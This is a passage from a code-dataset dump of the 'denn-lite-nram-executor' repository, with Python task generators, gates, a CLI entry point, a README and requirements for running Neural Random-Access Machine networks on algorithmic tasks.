list_elements_a\n init_mem[:, (offset + arrays_memory_size + 1):(offset + (2 * arrays_memory_size) + 1)] = list_elements_b\n\n out_mem = init_mem.copy()\n out_mem[:, (offset + (2 * arrays_memory_size) + 2):(offset + (3 * arrays_memory_size) + 2)] = \\\n list_elements_a_plus_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, (offset + (2 * arrays_memory_size) + 2):(offset + (3 * arrays_memory_size) + 2)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.5217047929763794,
"alphanum_fraction": 0.5509076714515686,
"avg_line_length": 39.870967864990234,
"blob_id": "350c4202e7ac81cb27168b4fa186fc6d451b6246",
"content_id": "134c717659dda10b4566587d855d863aab5a4579",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1271,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 31,
"path": "/tasks/TaskSwap.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskSwap(Task):\n \"\"\" [Swap]\n Given two pointers p, q and an array A, swap elements A[p] and A[q]. Input is\n given as p, q, A[0], .., A[p], ..., A[q], ..., A[n − 1], 0. The expected modified array A is:\n A[0], ..., A[q], ..., A[p], ..., A[n − 1].\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n idx_1 = np.random.randint(2, self.max_int - 3, size=(self.batch_size), dtype=np.int32)\n idx_2 = np.array([], dtype=np.int32)\n for i, n in enumerate(idx_1):\n idx_2 = np.append(idx_2, np.random.randint(idx_1[i] + 1, self.max_int - 2))\n init_mem = np.random.randint(1, self.max_int, size=(self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, self.max_int - 1] = 0\n init_mem[:, 0] = idx_1\n init_mem[:, 1] = idx_2\n\n error_mask = np.ones((self.batch_size, self.max_int), dtype=np.int8)\n out_mem = init_mem.copy()\n for i in range(self.batch_size):\n out_mem[i, idx_1[i]], out_mem[i, idx_2[i]] = np.copy(out_mem[i, idx_2[i]]), np.copy(out_mem[i, idx_1[i]])\n error_mask[i, idx_1[i]], error_mask[i, idx_2[i]] = 1, 1\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5415986776351929,
"alphanum_fraction": 0.5448613166809082,
"avg_line_length": 23.039215087890625,
"blob_id": "5c02b78d317914c534b199cbffaf5fc5771ec2db",
"content_id": "a64e49eb5bd5ec235a8d4af72909bc04b7850acc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 51,
"path": "/Node.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport pygraphviz as pgv\n\nclass Node(object):\n\n # Enum\n Register = 0\n Gate = 1\n\n def __init__(self, type: int, name: str, arity: int = -1):\n self.__type = type\n self.__name = name\n self.__arity = arity\n self.__nodes = []\n\n @property\n def type(self) -> int:\n return self.__type\n\n @type.setter\n def type(self, type: int) -> None:\n self.__type = type\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, name: str) -> None:\n self.__name = name\n\n @property\n def nodes(self) -> list:\n return self.__nodes\n\n @nodes.setter\n def nodes(self, nodes: list) -> None:\n self.__nodes = nodes\n\n def add_node(self, node):\n self.__nodes.append(node)\n\n def check_validity(self) -> bool:\n \"\"\"Check recursively whether there is a path to a Register of the next timestep or to the gate Write.\"\"\"\n nodes = self.__nodes.copy()\n for node in self.__nodes:\n if not node.check_validity():\n nodes.remove(node)\n if self.name != \"Write\" and \"R'\" not in self.name and len(nodes) == 0:\n return False\n return True\n"
},
{
"alpha_fraction": 0.5431211590766907,
"alphanum_fraction": 0.5564681887626648,
"avg_line_length": 44.943397521972656,
"blob_id": "b5a83924608a12332df8a441f8baaef3ca779f11",
"content_id": "9991a03e712db14ad6d928eedde999a79650f913",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4872,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 106,
"path": "/tasks/TaskWalkBST.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskWalkBST(Task):\n \"\"\" [WalkBST]\n Given a pointer to the root of a Binary Search Tree, and a path to be traversed,\n return the element at the end of the path. The BST nodes are represented as triples (v, l,\n r), where v is the value, and l, r are pointers to the left/right child. The triples are placed\n randomly in the memory. Input is given as root, out, d1, d2, ..., dk, NULL, ..., where root\n points to the root node and out is a slot for the output. The sequence d1...dk, di ∈ {0, 1}\n represents the path to be traversed: di = 0 means that the network should go to the left\n child, di = 1 represents going to the right child.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n def get_element_index(permutation: np.ndarray, idx: int) -> int:\n \"\"\" Get the index where the permutation have the value idx. \"\"\"\n return np.where(permutation == idx)[0][0]\n\n def insert_in_bst(bst: np.ndarray, pointer: int, element: int, element_pointer_in_memory: int) -> np.ndarray:\n \"\"\" Insert an element in the BST. \"\"\"\n if bst[pointer] > element:\n if bst[pointer + 1] == -1:\n bst[pointer + 1] = element_pointer_in_memory\n return bst\n else:\n return insert_in_bst(bst, int(bst[pointer + 1]), element, element_pointer_in_memory)\n else:\n if bst[pointer + 2] == -1:\n bst[pointer + 2] = element_pointer_in_memory\n return bst\n else:\n return insert_in_bst(bst, int(bst[pointer + 2]), element, element_pointer_in_memory)\n\n def walk_bst(bst: np.ndarray, walk: np.ndarray, previous_pointer: int, pointer: int):\n \"\"\" Walk, set a walk sequence, the bst and return the last element encountered. \"\"\"\n if pointer == -1:\n return bst[previous_pointer]\n elif len(walk) == 0:\n return bst[pointer]\n else:\n if walk[0] == 0:\n return walk_bst(bst, walk[1:], pointer, int(bst[pointer + 1]))\n else:\n return walk_bst(bst, walk[1:], pointer, int(bst[pointer + 2]))\n\n remaining_size = self.max_int - 3\n num_elements = int(remaining_size / 4)\n offset = 2\n divider_pointer = offset + num_elements\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n out_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create and initialize elements of bsts\n list_elements = np.random.randint(1, self.max_int, size=(self.batch_size, num_elements), dtype=np.int32)\n\n # Create and initialize the walk in bst\n walks_bst = np.random.randint(0, 2, size=(self.batch_size, num_elements), dtype=np.int32)\n\n # Create the elements order in memory through permutation matrices\n orders_in_memory = np.stack([np.random.permutation(num_elements)\n for _ in range(self.batch_size)], axis=0)\n\n for e in range(self.batch_size):\n # Create a temporary vector that contains a BST for an example\n example_bst = np.ones(num_elements * 3, dtype=np.int32) * -1\n root_pointer = -1\n for i in range(num_elements):\n pointer = get_element_index(orders_in_memory[e], i)\n example_bst[pointer * 3] = list_elements[e, i]\n if i is 0:\n root_pointer = pointer * 3\n\n # Initialize BST\n for i in range(1, num_elements):\n example_bst = insert_in_bst(example_bst, root_pointer, list_elements[e, i],\n get_element_index(orders_in_memory[e], i) * 3)\n\n # Fill the memories\n init_mem[e, 0] = divider_pointer + 1 + root_pointer\n init_mem[e, offset:divider_pointer] = walks_bst[e]\n\n # Walk the bst before the normalization\n value_found = walk_bst(example_bst, walks_bst[e], -1, root_pointer)\n\n # Normalize bst 
pointers for the memory and then save it\n for idx in range(example_bst.size):\n if idx % 3 != 0:\n if example_bst[idx] != -1:\n example_bst[idx] += divider_pointer + 1\n else:\n example_bst[idx] = 0\n\n init_mem[e, (divider_pointer + 1):(divider_pointer + 1 + (3 * num_elements))] = example_bst\n\n out_mem[e] = init_mem[e]\n out_mem[e, 1] = value_found\n\n cost_mask = np.ones((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 0] = 0\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.6782572269439697,
"alphanum_fraction": 0.7029744386672974,
"avg_line_length": 23.86458396911621,
"blob_id": "1fad5a55ad2b97f9770795c605b1fb8e1d9e6e43",
"content_id": "3fa05c2a1679927c23592fa77601980b64bffa41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2387,
"license_type": "permissive",
"max_line_length": 205,
"num_lines": 96,
"path": "/Readme.md",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "NRAM Executor\n=============\n\nSpecial thanks to [Andrew Gibiansky](http://andrew.gibiansky.com) for\n[code inspirations](https://github.com/gibiansky/experiments) and [Gabriele Di Bari](https://github.com/Gabriele91) for his support.\n\nThis implementation of Neural Random-Access Machines ([https://arxiv.org/pdf/1511.06392.pdf](https://arxiv.org/pdf/1511.06392.pdf)) does not contains any learning algorithm, so don't use it for this scope.\nIts only purpose is to test a pre-instructed neural network generated with [DENN-LITE](https://github.com/Gabriele91/DENN-LITE) over a specific task.\n\nAnyway almost all the NRAM aspects are implemented, the only things missing out are cost calculation (that it is not useful for this scope) and some plotting functions.\n\nPrerequisites\n-------------\n- Python 3.5+\n- NumPy 1.14.0\n- matplotlib 2.1\n- pygraphviz 1.3.1\n- tqdm 4.19.6\n#### Install requirements \n```sh\n$ pip install -r requirements.txt\n```\n\nUsage\n-----\nTo test a configuration:\n\n $ python main.py tests/test_copy_working_best.json\n\nTo recall the help:\n\n $ python main.py -h\n\nFlags\n-----\n#### --info\nActivate the printing to console of every execution timestep, with all\nthe information about the gates and registers (like coefficients and values).\n\n```sh\n$ python main.py tests/example.json --info\n\nOR\n\n$ python main.py tests/example.json -i\n```\n\n#### --timesteps N+\nThe list of timesteps for which the NRAM should been run.\n```sh\n$ python main.py tests/example.py --timesteps 10 [...]\n\nOR\n\n$ python main.py tests/example.py -t 10 [...]\n```\n\n#### --max_int N+\nThe list of difficulties of integers for which the NRAM should work on.\n```sh\n$ python main.py tests/example.py --max_int 10 [...]\n\nOR\n\n$ python main.py tests/example.py -mi 10 [...]\n```\n\n#### --print_circuits [1 | 2]\nWith **1** activate the complete printing of the circuits and with **2** activate the pruned printing of the circuits.\n```sh\n$ python main.py tests/example.py --print_circuits 2\n\nOR\n\n$ python main.py tests/example.py -pc 2\n```\n\n#### --print_memories\nActivate the printing of the memories status in TeX format.\n```sh\n$ python main.py tests/example.py --print_circuits 2\n\nOR\n\n$ python main.py tests/example.py -pc 2\n```\n\n#### --process_pool [1|2|3|4|...]\nThe number of process to spawn when the NRAM compute the samples.\n```sh\n$ python main.py tests/example.py --process_pool 8\n\nOR\n\n$ python main.py tests/example.py -pp 8\n```\n"
},
{
"alpha_fraction": 0.5690093040466309,
"alphanum_fraction": 0.5884843468666077,
"avg_line_length": 45.313724517822266,
"blob_id": "66d3564f4cb2ffbddf82b53f2baaa8aaf6a68340",
"content_id": "9049fb2cb44a3d6e3ca0c46b6f0840bcade7e883",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2366,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 51,
"path": "/tasks/TaskMerge.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskMerge(Task):\n \"\"\" [Merge]\n Given pointers to 2 sorted arrays A and B, and the pointer to the output o,\n merge the two arrays into one sorted array. The input is given as: a, b, o, A[0], .., A[n −1],\n G, B[0], ..., B[m − 1], G, where G is a special guardian value, a and b point to the first\n elements of arrays A and B respectively, and o points to the address after the second G.\n The n + m element should be written in correct order starting from position o.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = self.max_int - 6\n offset = 3\n odd_space = not remaining_size % 2 == 0\n odd_subvector_space = not remaining_size % 4 == 0\n list_size_a = int(remaining_size / 4)\n list_size_b = int(list_size_a + 1 if odd_subvector_space else list_size_a)\n list_size_a_plus_b = list_size_a + list_size_b\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.sort(\n np.random.randint(1, self.max_int, size=(self.batch_size, list_size_a), dtype=np.int32))\n list_elements_b = np.sort(\n np.random.randint(1, self.max_int, size=(self.batch_size, list_size_b), dtype=np.int32))\n list_elements_a_union_b = np.sort(np.concatenate((list_elements_a, list_elements_b), axis=1))\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + list_size_a + 1\n init_mem[:, 2] = offset + (2 * list_size_a) + (3 if odd_subvector_space else 2)\n init_mem[:, offset:(offset + list_size_a)] = list_elements_a\n init_mem[:, (offset + list_size_a)] = -1\n init_mem[:, (offset + list_size_a + 1):(offset + list_size_a_plus_b + 1)] = list_elements_b\n init_mem[:, (offset + list_size_a_plus_b + 1)] = -1\n if odd_space:\n init_mem[:, -2:] = -1\n else:\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n out_mem[:, (offset + list_size_a_plus_b + 2):(offset + (2 * list_size_a_plus_b) + 2)] = list_elements_a_union_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, (offset + list_size_a_plus_b + 2):(offset + (2 * list_size_a_plus_b) + 2)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.48649337887763977,
"alphanum_fraction": 0.48853209614753723,
"avg_line_length": 37.85148620605469,
"blob_id": "274196f8af6c54d25a4efa132a163330a89598fe",
"content_id": "7283bdc23da8f134fec501107c5ab8072721e55f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 101,
"path": "/main.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport os\nimport json\nfrom argparse import ArgumentParser\n\n# Project\nfrom App import App\nfrom NRam import NRam\nfrom NRamContext import NRamContext\nfrom factories.GateFactory import GateFactory\nfrom util import create_dir\n\n\nif __name__ == \"__main__\":\n create_dir(App.get(\"images_path\"))\n\n ap = ArgumentParser()\n\n ap.add_argument(\"file\",\n type=str,\n help=\"The file where resides the configuration of NRAM\", )\n ap.add_argument(\"--batch_size\", \"-bs\",\n dest=\"batch_size\",\n type=int,\n default=2,\n help=\"The examples to analyze\", )\n ap.add_argument(\"--timesteps\", \"-t\",\n dest=\"timesteps\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The timesteps that the NRAM must execute\", )\n ap.add_argument(\"--max_ints\", \"-mi\",\n dest=\"max_ints\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The dimensions of the sets of numbers\", )\n ap.add_argument(\"--sequence_size\", \"-ss\",\n dest=\"sequence_size\",\n nargs=\"+\",\n type=int,\n required=True,\n help=\"The size of the input sequence.\", )\n ap.add_argument(\"--info\", \"-i\",\n dest=\"info\",\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Write out the info of NRAM, like memories and registers\", )\n ap.add_argument(\"--print_circuits\", \"-pc\",\n dest=\"print_circuits\",\n type=int,\n default=0,\n help=\"Draw the circuit of each timestep to a file with a progressive numeration [e.g. \"\n \"<filename>.1.1.png, ..., <filename>.S.T.png, where S is the sample and T is the timestep]. \"\n \"With: \"\n \" • 0 the circuits are not printed; \"\n \" • 1 the circuits are printed entirely; \"\n \" • 2 the circuits are printed pruning the Gates or Registers R* which have not a path to a Register(s) R'*.\",)\n ap.add_argument(\"--print_memories_in_step_to_file\", \"-pmtf\",\n dest=\"print_memories\",\n nargs='?',\n const=True,\n default=False,\n help=\"For each sample and for each step, write to file the memory and the registers.\", )\n ap.add_argument(\"--process_pool\",\n \"-pp\",\n dest=\"process_pool\",\n type=int,\n default=1,\n help=\"Set how many threads should be used for the tests.\")\n ap.add_argument(\"--stop_at_the_will\",\n \"-satw\",\n dest=\"stop_at_the_will\",\n nargs='?',\n const=True,\n default=False,\n help=\"Activate the stop for the will of the NRAM.\")\n\n args, leftovers = ap.parse_known_args()\n\n with open(args.file) as f:\n test = json.load(f)\n test_args = test[\"arguments\"]\n\n NRam(NRamContext(\n batch_size=args.batch_size,\n l_max_int=args.max_ints,\n l_sequence_size=args.sequence_size,\n l_timesteps=args.timesteps,\n task_type=\"task_%s\" % test_args[\"task\"],\n network=test[\"network\"],\n gates=[ GateFactory.create(g) for g in test_args[\"gates\"] ],\n info_is_active=args.info,\n print_circuits=args.print_circuits,\n print_memories=args.print_memories,\n path_config_file=os.path.abspath(args.file),\n process_pool=args.process_pool,\n stop_at_the_will=args.stop_at_the_will\n )).execute()\n"
},
{
"alpha_fraction": 0.6307692527770996,
"alphanum_fraction": 0.6384615302085876,
"avg_line_length": 20.75,
"blob_id": "c9f13e5c6ed71c392f58783ffe28e8f7a65f4351",
"content_id": "04feb8cba2ccf9bc7a4d4d5b1289d855c5fff3ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Zero.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom util import to_one_hot\nfrom gates.Gate import Gate\n\n\nclass Zero(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n return M, to_one_hot(0, M.shape[1])"
},
{
"alpha_fraction": 0.5715162754058838,
"alphanum_fraction": 0.5899325013160706,
"avg_line_length": 44.25,
"blob_id": "540c16fb2ba5f63a498f411c288870e5d6cce247",
"content_id": "e1ec919dd5e08ef3c315788566a55f63ad4d3365",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1637,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 36,
"path": "/tasks/TaskPermutation.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\nfrom util import encode\n\n\nclass TaskPermutation(Task):\n \"\"\" [Permutation]\n Given two arrays of n elements: P (contains a permutation of numbers 0, . . . , n − 1) and\n A (contains random elements), permutate A according to P. Input is given as\n a, P[0], ..., P[n − 1], A[0], ..., A[n − 1], where a is a pointer to the array A. The\n expected output is A[P[0]], ..., A[P[n − 1]], which should override the array P.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n pointer = int(np.ceil(self.max_int / 2) if self.max_int % 2 != 0 else self.max_int / 2)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = pointer\n for idx in range(self.batch_size):\n init_mem[idx, 1:(1 + self.sequence_size)] = np.random.permutation(self.sequence_size)\n init_mem[:, pointer:(pointer + self.sequence_size)] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, self.sequence_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n permutations = encode(out_mem[:, 1:(1 + self.sequence_size)])\n for idx in range(self.batch_size):\n out_mem[idx, 1:(1 + self.sequence_size)] = np.tensordot(out_mem[idx, pointer:(pointer + self.sequence_size)],\n permutations[idx], axes=(0, 1))\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 1:(1 + self.sequence_size)] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.4833333194255829,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 14.25,
"blob_id": "f3189775d0e1401b145f809242d4cebe59bb246b",
"content_id": "ab8545c95781e2d584e3640d5825dee5f0fab885",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 60,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "numpy==1.14.0\nmatplotlib==2.1\npygraphviz==1.3.1\ntqdm==4.19.6"
},
{
"alpha_fraction": 0.592476487159729,
"alphanum_fraction": 0.6112852692604065,
"avg_line_length": 25.66666603088379,
"blob_id": "34b7bfd50186a1f1df318dde03e8a78fc4f0e345",
"content_id": "603f8df3cd6a0d60409a4c9e8bbcd3dcc1bd3983",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 12,
"path": "/activation_functions.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n\ndef relu(a: np.ndarray) -> np.ndarray:\n return np.maximum(a, 0)\n\ndef softmax(a: np.ndarray) -> np.ndarray:\n return np.exp(a - np.max(a)) / np.exp(a - np.max(a)).sum(1)[..., None]\n\ndef sigmoid(a: np.ndarray) -> np.ndarray:\n return 1. / (1. + np.exp(-np.array(a, dtype=np.float64)))"
},
{
"alpha_fraction": 0.6107171177864075,
"alphanum_fraction": 0.6264775395393372,
"avg_line_length": 39.935482025146484,
"blob_id": "9aef294573a8f99af21d3830f9613358831d93b2",
"content_id": "a0134a424ab5699240ccb6cb7ad22847b2870f04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1277,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 31,
"path": "/tasks/TaskCopy.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskCopy(Task):\n \"\"\" [Copy]\n Given an array and a pointer to the destination, copy all elements from the array to\n the given location. Input is given as p, A[0], ..., A[n−1] where p points to one element after\n A[n−1]. The expected output is A[0], ..., A[n−1] at positions p, ..., p+n−1 respectively.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = int(self.max_int - 2)\n vector_size = min(int(remaining_size / 2), self.sequence_size)\n starting_point = int(np.floor(self.max_int / 2))\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 1:1 + vector_size] = np.random\\\n .randint(1, self.max_int, size=(self.batch_size, vector_size), dtype=np.int32)\n init_mem[:, 0] = starting_point\n\n out_mem = init_mem.copy()\n out_mem[:, starting_point:starting_point + vector_size] = np.copy(out_mem[:, 1:1 + vector_size])\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, starting_point:starting_point + vector_size] = np.ones((self.batch_size, vector_size))\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5886625051498413,
"alphanum_fraction": 0.5922393202781677,
"avg_line_length": 41.91162872314453,
"blob_id": "621e26595ab44201ffc0ac3752437f5e0290eb98",
"content_id": "6e373ddff629dae087f167de94f4c66c04bfd92c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9232,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 215,
"path": "/NRam.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport concurrent.futures\nimport os\nimport shutil\n\n# Vendor\nimport numpy as np\n\nfrom tqdm import tqdm\n\n# Project\nfrom App import App\nfrom NRamContext import NRamContext\nfrom DebugTimestep import DebugTimestep\nfrom activation_functions import relu, sigmoid, softmax\nfrom util import print_memories, create_dir\n\n\nclass NRam(object):\n\n def __init__(self, context: NRamContext) -> None:\n self.context = context\n\n def execute(self) -> None:\n print(\"• Execution started\")\n # Create the base directory for a task (e.g. TaskAccess)\n task_base_path = \"%s%s\" % (App.get(\"images_path\"), self.context.tasks[0].__str__())\n create_dir(task_base_path)\n\n # Create the base directory for a test of DENN\n config_filename_without_extension = os.path.splitext(os.path.basename(self.context.path_config_file))[0]\n test_task_base_path = \"%s/%s\" % (task_base_path, config_filename_without_extension)\n create_dir(test_task_base_path, True) # Destroy all if the directory already exists\n\n # Copy the config file, for coherence\n shutil.copyfile(self.context.path_config_file, \"%s/config.json\" % test_task_base_path)\n\n for test_idx, task in enumerate(self.context.tasks):\n difficulty_test_base_path = \"%s/%s\" % (test_task_base_path, test_idx)\n create_dir(difficulty_test_base_path, True)\n\n # Retrieve batch of difficulty\n in_mem, out_mem, cost_mask, regs, timesteps = task()\n # Iterate over sample\n with concurrent.futures.ProcessPoolExecutor(max_workers=self.context.process_pool) as executor:\n futures = [executor.submit(self.execute_test_sample, self.context, s,difficulty_test_base_path,\n in_mem[s], out_mem[s], regs[s], timesteps)\n for s in range(self.context.batch_size)]\n\n for f in tqdm(concurrent.futures.as_completed(futures), total=self.context.batch_size) \\\n if not self.context.info_is_active else concurrent.futures.as_completed(futures):\n s, modified_in_mem = f.result()\n in_mem[s] = modified_in_mem\n print_memories(in_mem, out_mem, cost_mask, difficulty_test_base_path, test_idx)\n print(\"• Execution terminated\")\n\n def execute_test_sample(self, context, s, difficulty_test_base_path, in_mem, out_mem, regs, timesteps):\n if context.print_memories or context.print_circuits is not 0:\n sample_difficulty_base_path = \"%s/%s\" % (difficulty_test_base_path, s)\n create_dir(sample_difficulty_base_path, True)\n\n if context.info_is_active:\n print(\"\\nSample[%d], Initial memory: %s, Desired memory: %s, Initial registers: %s\"\n % (s, in_mem[:].argmax(axis=1), out_mem, regs[:].argmax(axis=1)))\n\n # Iterate for every timestep\n debug = list() # Init debug dictionary for the sample\n for t in range(timesteps):\n dt = DebugTimestep(context, t, s)\n coeffs, complete = self.__run_network(regs, dt)\n regs, in_mem = self.__run_circuit(regs, in_mem, context.gates, coeffs, dt)\n debug.append(dt)\n\n if self.context.stop_at_the_will and complete.sum() >= 1.0:\n break\n\n # Debug for the sample\n if context.info_is_active:\n for dt in debug:\n print(dt)\n print(\"\\t• Expected mem => %s\" % out_mem)\n\n if context.print_memories:\n with open(\"%s/memories.txt\" % sample_difficulty_base_path, \"a+\") as f:\n f.write(\"\\\\textbf{Step} & %s & %s & Read & Write \\\\\\\\ \\hline \\n\"\n % (\" & \".join([\"%s\" % r for r in range(out_mem.shape[0])]),\n \" & \".join([\"\\\\textit{r}%d\" % r for r in range(context.num_regs)])))\n for dt in debug:\n dt.print_memory_to_file(sample_difficulty_base_path, timesteps)\n\n if context.print_circuits is not 0:\n # Create dir for the 
single example of a difficulty\n for dt in debug:\n if context.print_circuits is 1:\n dt.print_circuit(sample_difficulty_base_path)\n else:\n dt.print_pruned_circuit(sample_difficulty_base_path)\n\n return s, in_mem\n\n def avg(self, regs: np.array, coeff: np.array) -> np.array:\n \"\"\" Make the product between (registers + output of the gates)\n and a coefficient for the value selection \"\"\"\n value = np.array(\n np.tensordot(\n regs.transpose([1, 0]),\n coeff.transpose([1, 0]),\n axes=1\n ).transpose([1, 0]),\n dtype=np.float32\n )\n return value\n\n def __run_gate(self, gate_inputs, mem, gate, controller_coefficients):\n \"\"\"Return the output of a gate in the circuit.\n\n gate_inputs:\n The values of the registers and previous gate outputs.\n gate:\n The gate to compute output for. Arity must\n match len(controller_coefficients).\n controller_coefficients:\n A list of coefficient arrays from the controller,\n one coefficient for every gate input (0 for constants).\n \"\"\"\n args = [self.avg(gate_inputs, coefficients)\n for coefficients in controller_coefficients]\n mem, output = gate(mem, *args)\n\n # Special-case constant gates.\n # Since they have no outputs, they always output\n # one sample. Repeat their outputs as many times\n # as necessary, effectively doing manual broadcasting\n # to generate an output of the right size.\n if gate.arity == 0:\n output = output[None, ...]\n\n return output, mem, args\n\n def __run_circuit(self, registers: np.array, mem: np.array, gates: np.array,\n controller_coefficients: np.array, debug: DebugTimestep) -> (np.ndarray, np.ndarray):\n # Initially, only the registers may be used as inputs.\n gate_inputs = registers\n\n # Debug purpose, dictionary for gates and regs history\n debug_step_gates = dict()\n debug_step_regs = dict()\n debug_previous_mod_regs = dict()\n\n debug.mem_previous_mod = mem.argmax(axis=1)\n # Run through all the gates.\n for i, (gate, coeffs) in enumerate(zip(gates, controller_coefficients)):\n output, mem, args = self.__run_gate(gate_inputs, mem, gate, coeffs)\n\n gate_info = dict()\n for i in range(gate.arity):\n gate_info[str(i)] = [coeffs[i].argmax(), args[i].argmax()]\n gate_info[\"res\"] = output.argmax()\n debug_step_gates[gate.__str__()] = gate_info\n\n # Append the output of the gate as an input for future gates.\n gate_inputs = np.concatenate([gate_inputs, output])\n debug.gates = debug_step_gates\n debug.mem = mem.argmax(axis=1)\n\n # All leftover coefficients are for registers.\n for i, coeff in enumerate(controller_coefficients[len(gates):]):\n debug_previous_mod_regs[str(i)] = [coeff.argmax(), gate_inputs[i].argmax()]\n gate_inputs[i] = self.avg(gate_inputs, coeff)\n debug_step_regs[str(i)] = [coeff.argmax(), gate_inputs[i].argmax()]\n debug.regs_previous_mod = debug_previous_mod_regs\n debug.regs = debug_step_regs\n\n return gate_inputs[np.arange(self.context.num_regs)], mem\n\n def __run_network(self, registers: np.array, debug: dict = None) -> np.array:\n\n def take_params(values, i):\n \"\"\"Return the next pair of weights and biases after the\n starting index and the new starting index.\"\"\"\n return values[i], values[i + 1], i + 2\n\n # Extract the 0th (i.e. 
